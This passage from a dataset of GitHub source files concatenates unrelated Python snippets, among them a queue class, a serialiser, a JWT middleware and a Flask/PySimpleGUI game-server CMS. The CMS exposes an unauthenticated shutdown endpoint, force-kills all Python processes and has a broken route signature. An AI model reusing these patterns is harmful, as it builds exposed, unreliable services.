17,49,60,61\nindi_standardized.loc[(t,slice(None))].iloc[:,:-2].cov()","repo_name":"Harbes/python","sub_path":"paper-PhD/Lab-SIR.py","file_name":"Lab-SIR.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36983535338","text":"class Node:\n\tdef __init__(self, value):\n\t\tself.value = value\n\t\tself.next = None\n\nclass Queue:\n\tdef __init__(self):\n\t\tself.first = None\n\t\tself.last = None\n\t\tself.length = 0\n\n\tdef isEmpty(self):\n\t\treturn bool(self.length is 0)\n\n\tdef peek(self):\n\t\treturn self.first\n\n\tdef push(self,value):\n\t\tnewNode = Node(value)\n\t\tif (self.length == 0):\n\t\t\tself.first = newNode\n\t\t\tself.last = self.first\n\t\telse:\n\t\t\tself.last.next = newNode\n\t\t\tself.last = newNode\n\t\tself.length += 1\n\t\treturn self\n\n\tdef pop(self):\n\t\tif (self.length == 0):\n\t\t\treturn \"Nothing to return\"\n\n\t\tpopped = self.first\n\t\tif (self.length == 1):\n\t\t\tself.first = None\n\t\t\tself.last = None\n\t\telse:\n\t\t\tself.first = self.first.next\n\n\t\tself.length -= 1\n\t\treturn popped\n\nmyQ = Queue()","repo_name":"april9288/ds_algorithms","sub_path":"Data Structures/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11279974700","text":"from abc import ABC, abstractclassmethod, abstractproperty\n\n\nbasic_types = (str, int, bool, float, complex, type(None))\nforbidden_names = {\"modifier_name\"}\n\n\nclass Modifier(ABC):\n\n name = abstractproperty()\n modifies = abstractproperty()\n\n @abstractclassmethod\n def compose(cls, stream, context):\n pass\n\n @abstractclassmethod\n def decompose(cls, value, stream, context):\n pass\n\n\nclass ModifierManager:\n\n def __init__(self, context=None, modifiers=None):\n if modifiers is None:\n modifiers = []\n if context is None:\n context = {}\n\n self._modifiers = []\n self._type_to_modifier = {}\n self._name_to_modifier = {}\n\n self.context = context\n\n for m in modifiers:\n self.add_modifier(m)\n\n def add_modifier(self, modifier_cls):\n self._modifiers.append(modifier_cls)\n self._type_to_modifier[modifier_cls.modifies] = modifier_cls\n self._name_to_modifier[modifier_cls.name] = modifier_cls\n\n def from_name(self, name):\n return self._name_to_modifier[name]\n\n def from_class(self, cls):\n return self._type_to_modifier[cls]\n\n\nclass StreamBase(ABC):\n\n def __init__(self, data=None, modifier_manager=None):\n if data is None:\n data = {}\n\n self._data = data\n self._modifier_manager = modifier_manager\n\n def substream(self, name):\n try:\n data = self._data[name]\n\n except KeyError:\n self._data[name] = data = {}\n\n return self.__class__(data, modifier_manager=self._modifier_manager)\n\n\nclass ReadStream(StreamBase):\n\n def read(self, name):\n value = self._data[name]\n\n if isinstance(value, dict):\n if 'modifier_name' in value:\n substream = self.__class__(data=value, modifier_manager=self._modifier_manager)\n\n modifier_name = value['modifier_name']\n modifier = self._modifier_manager.from_name(modifier_name)\n value = modifier.compose(substream, self._modifier_manager.context)\n\n else:\n raise ValueError(\"Cannot read substream\")\n\n return value\n\n\nclass WriteStream(StreamBase):\n\n def write(self, name, value):\n if name in forbidden_names:\n raise ValueError(\"Forbidden name {!r}\".format(name))\n\n if not isinstance(value, basic_types):\n type_cls = value.__class__\n\n try:\n modifier = self._modifier_manager.from_class(type_cls)\n\n except KeyError:\n raise TypeError(\"Value must be str, int, bool, complex, float, NoneType or modifiable, not {!r}\"\n .format(type_cls))\n\n substream = self.__class__(modifier_manager=self._modifier_manager)\n modifier.decompose(value, substream, self._modifier_manager.context)\n\n value = substream._data\n value['modifier_name'] = modifier.name\n\n self._data[name] = value\n","repo_name":"agoose77/basic_serialisation","sub_path":"serialiser/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40905291803","text":"class Solution:\n def permute(self, nums: list[int]) -> list[list[int]]:\n allPermutations = []\n for x in nums:\n holdinglist = []\n holdinglist.extend(self.permuteHelper([x],nums))\n if len(holdinglist) == 0:\n holdinglist = [[x]]\n else:\n for y in holdinglist:\n y.append(x)\n allPermutations.extend(holdinglist)\n return allPermutations\n \n def permuteHelper(self, elements: list[int], nums: list[int] ) -> list[list[int]]:\n if len(elements) == len(nums):\n return []\n allPermutations = []\n for x in nums:\n holdinglist = []\n if x in elements:\n continue\n else:\n elements.append(x)\n holdinglist.extend(self.permuteHelper(elements,nums))\n elements.pop()\n if len(holdinglist) == 0:\n holdinglist = [[x]]\n else:\n for y in holdinglist:\n y.append(x)\n allPermutations.extend(holdinglist)\n return allPermutations","repo_name":"LukeKnezCK/leetcodeNonsense","sub_path":"pythonStuff/leetcode46.py","file_name":"leetcode46.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17050694606","text":"from commands.command_handler import get_name\nfrom datas.batch_data import str_batch\n\n\nclass SaveBatch:\n def __init__(self, args):\n self.args = args\n\n def execute(self):\n try:\n arg_list = self.args.split()\n file_name = None\n if len(arg_list) == 2:\n file_name = arg_list[1] + '.dnabatch'\n elif len(arg_list) == 1:\n file_name = get_name(arg_list[0])+ '.dnabatch'\n else:\n raise ValueError\n print(file_name)\n f = open(file_name, \"w\")\n for command in str_batch.get(get_name(arg_list[0])):\n f.write(command+'\\n')\n f.close()\n except ValueError:\n print(\"Args not valid\")\n return\n except:\n print(\"Error\")\n","repo_name":"miryamduker/DNA-project","sub_path":"commands/batch_commands/saving_batch.py","file_name":"saving_batch.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2184936848","text":"\n## !/usr/bin/python\n## -*- coding:utf-8 -*-\nimport json\nimport analysis.AutoClaveStateDetect\n\nload_dict = {}\nload_dict2 = {}\nwith open(\"4XFIN1602902895Y1602943935.json\",'r') as load_f:\n load_dict = json.load(load_f)\n\nwith open(\"rec_templete.json\",'rb') as load_f:\n load_dict2 = json.load(load_f)\n\nload_dict3 = analysis.AutoClaveStateDetect.state_detect(load_dict, load_dict2)\nstring = json.dumps(load_dict3,ensure_ascii=False)\n\nwith open(\"4R1602902895.json\",\"w\",encoding='utf-8') as f:\n f.write(string)\n print(\"加载入文件完成...\")\n\n\n\"\"\"\nt_min = state[0]['t']\nt_max = 0\n\nfor rec in state:\n t = rec['t']\n t_max = t\n\nlen = len(state)\nadd = int(4095/12)\nt_add = int((t_max-t_min)/13)\n\nfor rec in state:\n t = rec['t']\n a = int((t-t_min)/t_add)\n if a > 12:\n a = 12\n state_val = a*add\n rec['v'] = state_val\n\nprint(state)\nwith open(\"4XFIN1602902895Y1602943935.json\",\"w\") as f:\n json.dump(load_dict,f)\n print(\"加载入文件完成...\")\n\"\"\"\n\"\"\"\nload_dict2 = {}\nwith open(\"4R1602902895.json\",'r') as load_f:\n load_dict2 = json.load(load_f)\n\nload_dict2[\"devInput\"] = \"正常\"\nload_dict2[\"sensorInput\"] = \"正常\"\nload_dict2[\"startTime\"] = 1602902895\nload_dict2[\"endTime\"] = 1602943935\nload_dict2[\"recordTime\"] = 1602943935-1602902895\nload_dict2[\"sampleNum\"] = len(state)\npre_state = -1\ninfo = load_dict2[\"stateInfo\"]\ncnt = 0\nfor rec in state:\n state_id = int(rec['v']/4090*12)\n if(pre_state != state_id):\n pre_state = state_id\n t = rec[\"t\"]\n sinf = info[\"state\"+str(state_id)]\n if state_id == 12:\n sinf[\"endTime\"] = load_dict2[\"endTime\"]\n sinf[\"startTime\"] = t\n sinf[\"startIndex\"] = cnt\n if state_id > 0:\n sinf = info[\"state\" + str(state_id-1)]\n sinf[\"endTime\"] = t\n sinf[\"endIndex\"] = cnt-1\n print(t)\n cnt = cnt + 1\n if(cnt > len(state)):\n break\n\nstring = json.dumps(load_dict2)\nwith open(\"4R1602902895.json\",\"w\") as f:\n f.write(string)\n print(\"加载入文件完成...\")\n\"\"\"","repo_name":"Travis-MA/Iot-CMP","sub_path":"doc/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4052154436","text":"from __future__ import annotations\n\nimport dataclasses\nfrom datetime import datetime, timezone\nfrom typing import TYPE_CHECKING, Sequence\n\nfrom guardpost.jwts import JWTValidator, InvalidAccessToken\nfrom jose import JWTError\nfrom jwt import DecodeError\nfrom litestar.contrib.jwt.jwt_token import Token\nfrom litestar.exceptions import NotAuthorizedException, ImproperlyConfiguredException\nfrom litestar.middleware import AbstractAuthenticationMiddleware, AuthenticationResult\n\n__all__ = (\"JWKAuthenticationMiddleware\")\n\nif TYPE_CHECKING:\n from typing import Any\n\n from litestar.connection import ASGIConnection\n from litestar.types import ASGIApp, Method, Scopes\n from litestar.utils import AsyncCallable\n\n\nclass JWKAuthenticationMiddleware(AbstractAuthenticationMiddleware):\n \"\"\"JWK Authentication middleware.\n\n This class provides JWK authentication functionalities.\n \"\"\"\n\n __slots__ = (\n \"auth_header\",\n \"retrieve_user_handler\",\n \"jwt_validator\",\n )\n\n def __init__(\n self,\n app: ASGIApp,\n auth_header: str,\n exclude: str | list[str] | None,\n exclude_http_methods: Sequence[Method] | None,\n exclude_opt_key: str,\n retrieve_user_handler: AsyncCallable[[Token, ASGIConnection[Any, Any, Any, Any]], Any],\n scopes: Scopes,\n jwt_validator: JWTValidator,\n ) -> None:\n \"\"\"Check incoming requests for an encoded token in the auth header specified, and if present retrieve the user\n from persistence using the provided function.\n\n Args:\n algorithm: JWT hashing algorithm to use.\n app: An ASGIApp, this value is the next ASGI handler to call in the middleware stack.\n auth_header: Request header key from which to retrieve the token. E.g. ``Authorization`` or ``X-Api-Key``.\n exclude: A pattern or list of patterns to skip.\n exclude_opt_key: An identifier to use on routes to disable authentication for a particular route.\n exclude_http_methods: A sequence of http methods that do not require authentication.\n retrieve_user_handler: A function that receives a :class:`Token <.contrib.jwt.Token>` and returns a user,\n which can be any arbitrary value.\n scopes: ASGI scopes processed by the authentication middleware.\n jwt_validator: Secret for decoding the JWT token. This value should be equivalent to the secret used to\n encode it.\n \"\"\"\n super().__init__(\n app=app,\n exclude=exclude,\n exclude_from_auth_key=exclude_opt_key,\n exclude_http_methods=exclude_http_methods,\n scopes=scopes,\n )\n self.auth_header = auth_header\n self.retrieve_user_handler = retrieve_user_handler\n self.jwt_validator = jwt_validator\n\n async def authenticate_request(self, connection: ASGIConnection[Any, Any, Any, Any]) -> AuthenticationResult:\n \"\"\"Given an HTTP Connection, parse the JWT api key stored in the header and retrieve the user correlating to the\n token from the DB.\n\n Args:\n connection: An Litestar HTTPConnection instance.\n\n Returns:\n AuthenticationResult\n\n Raises:\n NotAuthorizedException: If token is invalid or user is not found.\n \"\"\"\n auth_header = connection.headers.get(self.auth_header)\n if not auth_header:\n raise NotAuthorizedException(\"No JWT token found in request header\")\n encoded_token = auth_header.partition(\" \")[-1]\n return await self.authenticate_token(encoded_token=encoded_token, connection=connection)\n\n async def decode(self, encoded_token: str) -> Token:\n \"\"\"Decode a passed in token string and returns a Token instance.\n\n Args:\n encoded_token: A base64 string containing an encoded JWT.\n\n Returns:\n A decoded Token instance.\n\n Raises:\n NotAuthorizedException: If the token is invalid.\n \"\"\"\n try:\n payload = await self.jwt_validator.validate_jwt(access_token=encoded_token)\n #payload = jwt.decode(token=encoded_token, key=secret, algorithms=[algorithm], options={\"verify_aud\": False})\n exp = datetime.fromtimestamp(payload.pop(\"exp\"), tz=timezone.utc)\n iat = datetime.fromtimestamp(payload.pop(\"iat\"), tz=timezone.utc)\n field_names = {f.name for f in dataclasses.fields(Token)}\n extra_fields = payload.keys() - field_names\n extras = payload.pop(\"extras\", {})\n for key in extra_fields:\n extras[key] = payload.pop(key)\n return Token(exp=exp, iat=iat, **payload, extras=extras)\n except (KeyError, JWTError, ImproperlyConfiguredException, DecodeError, InvalidAccessToken) as e:\n raise NotAuthorizedException(\"Invalid token\") from e\n\n async def authenticate_token(\n self, encoded_token: str, connection: ASGIConnection[Any, Any, Any, Any]\n ) -> AuthenticationResult:\n \"\"\"Given an encoded JWT token, parse, validate and look up sub within token.\n\n Args:\n encoded_token: Encoded JWT token.\n connection: An ASGI connection instance.\n\n Raises:\n NotAuthorizedException: If token is invalid or user is not found.\n\n Returns:\n AuthenticationResult\n \"\"\"\n token = await self.decode(\n encoded_token=encoded_token\n )\n\n\n\n user = await self.retrieve_user_handler(token, connection)\n\n if not user:\n raise NotAuthorizedException()\n\n return AuthenticationResult(user=user, auth=token)\n\n","repo_name":"heralight/litestar-jwk-demo","sub_path":"src/backend/auth_middleware.py","file_name":"auth_middleware.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"30656345984","text":"# Ch.04 Exercise 4.1, 4.4, & 4.5 Official Answer\n# Guess a number from 0 to 100.\n# Will show \"Too Big\" or \"too small\".\n# will show the total guess time when get right number.\n# Not-interger will ask to re-enter\n\n# from random import randint\nimport random, types\n\nrandom.seed(100)\nnum = random.randint(0, 100)\ntim = 0\n\nwhile 1:\n try:\n putnum = eval(input(\"Please enter the number you guess: \"))\n\n if type(putnum) == type(1):\n tim += 1\n\n if putnum > num:\n print(\"Too Big!\")\n elif putnum < num:\n print(\"too small!\")\n elif putnum == num:\n print(\"Guess {} times, You got it!\".format(tim))\n break\n\n else:\n print(\"Must be an integer!\")\n\n except:\n print(\"Wrong Input!\")\n","repo_name":"TomFoxLee/Python543","sub_path":"PYECourse/Ch.04/a4.1_4.4_4.5o_NumberGuess.py","file_name":"a4.1_4.4_4.5o_NumberGuess.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30031025896","text":"import PySimpleGUI as sg\nimport os, re, subprocess\nfrom flask import Flask, render_template, flash, redirect, url_for, request, session\nfrom classes.forms import RegistrationForm\nfrom classes.functions import Main\nimport datetime, textwrap\nfrom configparser import ConfigParser\nfrom multiprocessing import Process\nimport webbrowser\n\nimport threading\n\nconfigPath = \"config.ini\"\nconfig = ConfigParser()\nconfig.read(configPath)\n\n\ndef validipv4(ip):\n pattern = re.compile(r\"\"\"\n ^\n (?:\n # Dotted variants:\n (?:\n # Decimal 1-255 (no leading 0's)\n [3-9]\\d?|2(?:5[0-5]|[0-4]?\\d)?|1\\d{0,2}\n |\n 0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)\n |\n 0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)\n )\n (?: # Repeat 0-3 times, separated by a dot\n \\.\n (?:\n [3-9]\\d?|2(?:5[0-5]|[0-4]?\\d)?|1\\d{0,2}\n |\n 0x0*[0-9a-f]{1,2}\n |\n 0+[1-3]?[0-7]{0,2}\n )\n ){0,3}\n |\n 0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff\n |\n 0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777\n |\n # Decimal notation, 1-4294967295:\n 429496729[0-5]|42949672[0-8]\\d|4294967[01]\\d\\d|429496[0-6]\\d{3}|\n 42949[0-5]\\d{4}|4294[0-8]\\d{5}|429[0-3]\\d{6}|42[0-8]\\d{7}|\n 4[01]\\d{8}|[1-3]\\d{0,9}|[4-9]\\d{0,8}\n )\n $\n \"\"\", re.VERBOSE | re.IGNORECASE)\n return pattern.match(ip) is not None\n\n\nsqlRefference = \"Windows Drivers Reference\\n\" \\\n \"{SQL Server} - released with SQL Server 2000\\n\" \\\n \"{SQL Native Client} - released with SQL Server 2005 (also known as version 9.0)\\n\" \\\n \"{SQL Server Native Client 10.0} - released with SQL Server 2008\\n\" \\\n \"{SQL Server Native Client 11.0} - released with SQL Server 2012\\n\" \\\n \"{ODBC Driver 11 for SQL Server} - supports SQL Server 2005 through 2014\\n\" \\\n \"{ODBC Driver 13 for SQL Server} - supports SQL Server 2005 through 2016\\n\" \\\n \"{ODBC Driver 13.1 for SQL Server} - supports SQL Server 2008 through 2016\\n\" \\\n \"{ODBC Driver 17 for SQL Server} - supports SQL Server 2008 through 2017\"\n\nsqlConnect = [\n [sg.Text(\"SQL Driver\", size=(10,1)), sg.DropDown(\n enable_events=True,\n readonly=True,\n font=10,\n default_value=config.get(\"sqlConfig\", \"sql_driver\"),\n size=(24,1),\n tooltip=sqlRefference, pad=(0,5),\n values=[\"{SQL Server}\",\n \"{SQL Native Client}\",\n \"{SQL Server Native Client 10.0}\",\n \"{SQL Server Native Client 11.0}\",\n \"{ODBC Driver 11 for SQL Server}\",\n \"{ODBC Driver 13 for SQL Server}\",\n \"{ODBC Driver 13.1 for SQL Server}\",\n \"{ODBC Driver 17 for SQL Server}\"])],\n [sg.Text(\"Instance\",size=(10,1),pad=(0,5) ), sg.InputText(default_text=(config.get(\"sqlConfig\", \"SQL_SERVER\"))), ],\n [sg.Text(\"Port\", size=(10,1) ,pad=(0,5) ),sg.InputText(default_text=(config.get(\"sqlConfig\", \"SQL_PORT\")))],\n [sg.Text(\"Username\", size=(10,1),pad=(0,5)),sg.InputText( default_text=(config.get(\"sqlConfig\", \"SQL_USER\")))],\n [sg.Text(\"Password\", size=(10,1),pad=(0,5)), sg.InputText(password_char=\"*\",default_text=(config.get(\"sqlConfig\", \"SQL_PASS\")))],\n [sg.Text(\"Database\", size=(10,1),pad=(0,5)), sg.InputText(default_text=(config.get(\"sqlConfig\", \"SQL_DBASE\")))]]\n\n\ndef isPortFree(host,port):\n import socket, errno\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.bind((host, port))\n except socket.error as e:\n return False\n finally:\n return True\n s.close()\n\n\ndef ExecuteCommandSubprocess(command, wait=False, quiet=True, *args):\n try:\n sp = subprocess.Popen([command,*args], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if wait:\n out, err = sp.communicate()\n if not quiet:\n if out:\n print(out.decode(\"utf-8\"))\n if err:\n print(err.decode(\"utf-8\"))\n except Exception as e:\n print('Exception encountered running command ', e)\n return ''\n\n return (out.decode('utf-8'))\n\ndef listThemes():\n themes_list = []\n for themes in os.listdir('templates/themes/'):\n themes_list.append(themes)\n return themes_list\n\ndef seasons(vars):\n if vars == \"Season 0-1\":\n return 20\n elif vars == \"Season 2-8\":\n return 32\n elif vars == \"Season 9-13\":\n return 64\n else:\n return 20\ndef season_reverse(value):\n if value == 20:\n return \"Season 0-1\"\n elif value == 32:\n return \"Season 2-8\"\n elif value == 64:\n return \"Season 9-13\"\n else:\n return \"Season 0-1\"\n\nwebSettings = [\n\n [sg.Text(\"Server Name\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get(\"webConfig\", \"server_name\"))), ],\n [sg.Text(\"Secret Key\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get(\"webConfig\", \"secret_key\")))],\n [sg.Text(\"Season\", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=season_reverse(config.getint(\"webConfig\", \"item_hex_len\")),\n values=[\"Season 0-1\", \"Season 2-8\", \"Season 9-13\"], readonly=True)],\n [sg.Text(\"Web Debug\", size=(10, 1), pad=(0, 5)), sg.Checkbox(text=\"\", default=config.getboolean(\"webConfig\", \"web_debug\"))],\n [sg.Text(\"Web IP\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get(\"webConfig\", \"web_ip\")))],\n [sg.Text(\"Web PORT\", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.getint(\"webConfig\", \"web_port\")))],\n [sg.Text(\"Web Theme\", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=config.get(\"webConfig\", \"web_theme\"),values=listThemes(), readonly=True)],\n [sg.Text(\"Theme Switcher\", size=(10, 1), pad=(0, 5)), sg.Checkbox(text=\"\", default=config.getboolean(\"webConfig\", \"theme_switcher\"))]\n]\n\n\n\nlayout = [[sg.TabGroup([[sg.Tab('SQL Settings', sqlConnect), sg.Tab('WEB Settings', webSettings)]])],\n [sg.Button('Start Server', disabled=False,auto_size_button=False),\n sg.Button('Stop Server', disabled=True, auto_size_button=False)]\n ]\n\nwindow = sg.Window('DTpyWeb GUI v2', icon=\"static/default-images/favicon.ico\",\n auto_size_text=False,\n default_element_size=(30, 1),\n return_keyboard_events=True,\n use_default_focus=False,\n text_justification=\"left\"\n ).Layout(layout).Finalize()\n\n\n\ndef runWeb():\n configPath = \"config.ini\"\n config = ConfigParser()\n config.read(configPath)\n\n main = Main()\n app = Flask(__name__)\n app.config['SECRET_KEY'] = config.get(\"webConfig\", \"secret_key\")\n @app.context_processor\n def _processor():\n return dict(\n date_now=datetime.datetime.now().strftime(\"%d.m.%Y %H:%M:%S\"),\n author=\"© 2020 r00tme - DTpyWeb. All rights reserved.\",\n theme=main.themes_check()[0],\n theme_switch_form = main.themes_check()[1],\n theme_switch_active = config.getboolean(\"webConfig\", \"theme_switcher\"),\n top10=main.rankings(\" TOP 10 \"),\n header=\"header.html\",\n server=config.get(\"webConfig\", \"server_name\"),\n )\n\n @app.route('/userinfo', methods=['GET'])\n @app.route('/userinfo', methods=['GET', 'POST'])\n def users_info(path):\n main.theme_switcher()\n if main.user_exist(path[1:], False):\n\n item_image = []\n item_info = []\n\n for i in range(0, 12):\n user_items = textwrap.wrap(main.return_items(path[1:]), config.getint(\"webConfig\", \"item_hex_len\"))[i]\n if main.item_info(user_items):\n item_image.append(main.item_info(user_items)[1])\n item_info.append(main.item_info(user_items)[0])\n else:\n item_image.append(\"\")\n item_info.append(\"\")\n return render_template(\"modules/userinfo.html\", title=\"Character Information Page\",\n item_info=item_info, item_image=item_image, character=path[1:])\n\n else:\n flash(r'This user does not exist', 'error')\n return redirect(url_for('home'))\n\n @app.route('/', methods=['GET', 'POST'])\n @app.route('/home', methods=['GET', 'POST'])\n def home():\n # TODO news System\n # * This route will be removed after the news system is completed\n main.login()\n main.theme_switcher()\n stripin = main.themes_check()[0].split('/')\n return render_template(\"%s/%s/home.html\" % (stripin[0], stripin[1]), title=\"News\")\n\n @app.route('/download', methods=['GET', 'POST'])\n @app.route('/about', methods=['GET', 'POST'])\n @app.route('/rules', methods=['GET', 'POST'])\n @app.route('/rankings', methods=['GET', 'POST'])\n def main_pages():\n main.login()\n main.theme_switcher()\n var = config.get(\"dl_links\", \"dl_links\")\n cors = str(var).split(\"\\n\")\n return render_template(\"modules/\" + request.path + \".html\", title=u\"%s\" % request.path[1:].capitalize(),\n download_links=cors)\n\n @app.route('/buy-credits', methods=['GET', 'POST'])\n @app.route('/my-auction', methods=['GET', 'POST'])\n @app.route('/buy-credits', methods=['GET', 'POST'])\n @app.route('/my-account', methods=['GET', 'POST'])\n @app.route('/my-characters', methods=['GET', 'POST'])\n @app.route('/vip-modules', methods=['GET', 'POST'])\n @app.route('/my-market', methods=['GET', 'POST'])\n def user_pages():\n main.theme_switcher()\n if 'username' not in session:\n flash(r'You do not have an access to this page', 'error')\n return redirect(url_for('home'))\n else:\n return render_template(\"modules/user/\" + request.path + \".html\",\n title=u\"%s %s Page\" % (request.path.split(\"-\")[0][1:].title(),\n request.path.split(\"-\")[1].title()))\n\n @app.route('/logout')\n def logout():\n session.pop('username', None)\n flash('You were logged out', 'info')\n return redirect('/home')\n\n @app.route('/register', methods=['GET', 'POST'])\n def register():\n main.theme_switcher()\n form = RegistrationForm()\n if form.validate_on_submit():\n main.register(\n form.username.data,\n form.password.data,\n form.email.data,\n form.question.data,\n form.answer.data)\n return render_template(\"modules/register.html\", title=\"Register\", form=form)\n\n @app.errorhandler(404)\n def page_not_found(e):\n return render_template(\"modules/404.html\", title=\"Page does not exist\"), 404\n\n from flask import request\n def shutdown_server():\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n\n @app.route('/shutdown', methods=['POST'])\n def shutdown():\n shutdown_server()\n return 'Server shutting down...'\n\n\n app.run(debug=False, host=config.get(\"webConfig\", \"web_ip\"),\n port=config.getint(\"webConfig\", \"web_port\"))\n\ndef thegui():\n while True:\n event, values = window.Read(timeout=0)\n if event is None or event == \"Exit\": # always, always give a way out!\n break\n if event is not sg.TIMEOUT_KEY:\n config.set(\"sqlConfig\", str(\"sql_driver\"), str(values[0]))\n config.set(\"sqlConfig\", str(\"sql_server\"), str(values[1]))\n if values[2].isdigit():\n config.set(\"sqlConfig\", \"sql_port\", values[2])\n else:\n sg.Popup(\"Type a valid and not in use port number\")\n window.FindElement(values[2]).Update(values[2][:-1])\n config.set(\"sqlConfig\", str(\"sql_user\"), str(values[3]))\n config.set(\"sqlConfig\", str(\"sql_pass\"), str(values[4]))\n config.set(\"sqlConfig\", str(\"sql_dbase\"), str(values[5]))\n\n\n config.set(\"webConfig\", str(\"server_name\"), str(values[6]))\n config.set(\"webConfig\", str(\"secret_key\"), str(values[7]))\n config.set(\"webConfig\", str(\"item_hex_len\"), str(seasons(values[8])))\n config.set(\"webConfig\", str(\"web_debug\"), str(values[9]))\n if validipv4(values[10]):\n config.set(\"webConfig\", str(\"web_ip\"), str(values[10]))\n else:\n sg.Popup(\"Type a valid IP address\")\n window.FindElement(values[10]).Update(values[10][:-1])\n if values[11].isdigit():\n config.set(\"webConfig\", \"web_port\", values[11])\n else:\n sg.Popup(\"Type a valid and not in use port number\")\n window.FindElement(values[11]).Update(values[11][:-1])\n config.set(\"webConfig\", str(\"web_theme\"), str(values[12]))\n config.set(\"webConfig\", str(\"theme_switcher\"), str(values[13]))\n\n with open(configPath, \"w+\") as f:\n config.write(f)\n if event == \"Start Server\":\n window.Element('Start Server').Update(disabled=True)\n window.Element('Stop Server').Update(disabled=False)\n if isPortFree(values[10], int(values[11])):\n threading.Thread(target=runWeb).start()\n os.startfile(\"http://\" + config.get(\"webConfig\",\"web_ip\") + \":\" + config.get(\"webConfig\",\"web_port\"))\n else:\n sg.Popup(\"Port %s is already in use, \\nchange the port or close the program that use it\" % values[10])\n if event == \"Stop Server\":\n os.system('taskkill /f /im DTpyWeb.exe')\n os.system('taskkill /f /im python.exe')\n os.system('start DTpyWeb.exe')\n\nif __name__ == '__main__':\n thegui()","repo_name":"r00tmebaby/DTpyweb-MUOnline-CMS","sub_path":"Python GUI Versions/DTpyWeb GUI v2 source/DTpyWeb.py","file_name":"DTpyWeb.py","file_ext":"py","file_size_in_byte":14845,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"2370145859","text":"import numpy as np\nfrom util import *\n#%matplotlib inline\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import Series,DataFrame\nimport matplotlib.animation as animation\nimport time\nimport datetime as dt\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\n\ndef animate(i):\n pullData = open(\"Data/data_demo.csv\",\"r\").read()\n dataArray = pullData.split('\\n')\n xar = []\n yar = []\n zar = []\n p = 0;\n for eachLine in dataArray:\n if len(eachLine)>1 and p==1:\n t,x,y = eachLine.split(';')\n xar.append(float(x))\n yar.append(float(t))\n zar.append(float(y))\n p = 1\n ax1.clear()\n ax1.set_title(\"Realtime metric CPU Plot\")\n ax1.set_xlabel(\"Time\")\n ax1.set_ylabel(\"Values in %\")\n ax1.plot(yar,xar)\n ax1.plot(yar,zar)\n #time.sleep(1)\n\n\n\nani = animation.FuncAnimation(fig, animate,interval=1000)\n\n\n\nplt.show()\n","repo_name":"heekof/Forecasting-ANN","sub_path":"live_graph.py","file_name":"live_graph.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73557210611","text":"import torch.nn as nn\r\nimport math\r\n\r\n\"\"\"\r\n Binary Classifier\r\n\"\"\"\r\n\r\nclass Binary_Classifier(nn.Module):\r\n def __init__(self, in_dim):\r\n super(Binary_Classifier, self).__init__()\r\n self.classifier = nn.Sequential(\r\n nn.Linear(in_dim, 4096),\r\n nn.BatchNorm1d(4096),\r\n nn.ReLU(True),\r\n nn.Linear(4096, 4096),\r\n nn.BatchNorm1d(4096),\r\n nn.ReLU(True),\r\n nn.Dropout(0.4),\r\n \r\n nn.Linear(4096,2048),\r\n nn.BatchNorm1d(2048),\r\n nn.ReLU(True),\r\n nn.Linear(2048,2048),\r\n nn.BatchNorm1d(2048),\r\n nn.ReLU(True),\r\n nn.Dropout(0.35), \r\n \r\n nn.Linear(2048,1024),\r\n nn.BatchNorm1d(1024),\r\n nn.ReLU(True),\r\n nn.Dropout(0.3), \r\n \r\n nn.Linear(1024,512),\r\n nn.BatchNorm1d(512),\r\n nn.ReLU(True),\r\n nn.Dropout(0.25), \r\n \r\n nn.Linear(512,2) # Binary \r\n )\r\n# # Initialize weights(L2 norm)\r\n# for m in self.modules():\r\n# if isinstance(m, nn.Conv2d):\r\n# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\r\n# m.weight.data.normal_(0, math.sqrt(2. / n))\r\n# m.bias.data.zero_()\r\n \r\n def forward(self, x):\r\n out = self.classifier(x)\r\n return out\r\n","repo_name":"willyouyang/MachineLearningForPython","sub_path":"TBrain/CredictCard/Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"244456921","text":"\nfrom flask import Flask, render_template,request,redirect,url_for\napp = 